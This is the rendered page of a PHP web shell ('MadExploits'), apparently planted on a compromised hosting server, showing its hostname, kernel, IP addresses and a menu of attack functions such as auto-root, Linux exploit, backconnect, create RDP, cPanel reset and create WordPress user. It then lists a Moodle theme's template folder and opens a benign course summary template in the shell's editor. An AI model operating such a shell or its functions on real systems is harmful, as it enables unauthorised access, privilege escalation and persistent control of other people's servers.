Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.27
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
trema /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
core
[ DIR ]
drwxr-xr-x
admin_setting_styleguide.musta...
12.54
KB
-rw-r--r--
columns2.mustache
3.83
KB
-rw-r--r--
course_summary_modal.mustache
1.92
KB
-rw-r--r--
footer.mustache
2.38
KB
-rw-r--r--
frontpage.mustache
7.29
KB
-rw-r--r--
frontpage_settings_menu.mustac...
1020
B
-rw-r--r--
lang_menu.mustache
1.81
KB
-rw-r--r--
login.mustache
1.92
KB
-rw-r--r--
mydashboard.mustache
4.33
KB
-rw-r--r--
mydashboard_admin.mustache
2.91
KB
-rw-r--r--
navbar.mustache
2.67
KB
-rw-r--r--
navbar_login.mustache
1.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_summary_modal.mustache
{{! This file is part of Moodle - http://moodle.org/ Moodle is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Moodle is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Moodle. If not, see <http://www.gnu.org/licenses/>. }} {{! Modal info for /course and list of courses available (site home). }} <!-- Button trigger modal --> <div class="card-see-more text-center"> <button type="button" class="btn btn-secondary m-2" data-toggle="modal" data-target="#modal-{{uniqid}}"> {{#str}}summarybutton_text, theme_trema{{/str}} </button> </div> <!-- Modal --> <div class="modal fade" id="modal-{{uniqid}}" tabindex="-1" role="dialog" aria-labelledby="modal-title-{{uniqid}}" aria-hidden="true"> <div class="modal-dialog modal-lg" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="modal-title-{{uniqid}}">{{#title}}{{title}}{{/title}}</h5> <button type="button" class="close" data-dismiss="modal" aria-label={{#quote}}{{#str}}closebuttontitle{{/str}}{{/quote}}> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> {{{body}}} </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">{{#str}}closebuttontitle{{/str}}</button> <a href="{{courselink}}" class="btn btn-primary">{{#str}}summarycourselink_text, theme_trema{{/str}}</a> </div> </div> </div> </div>
Close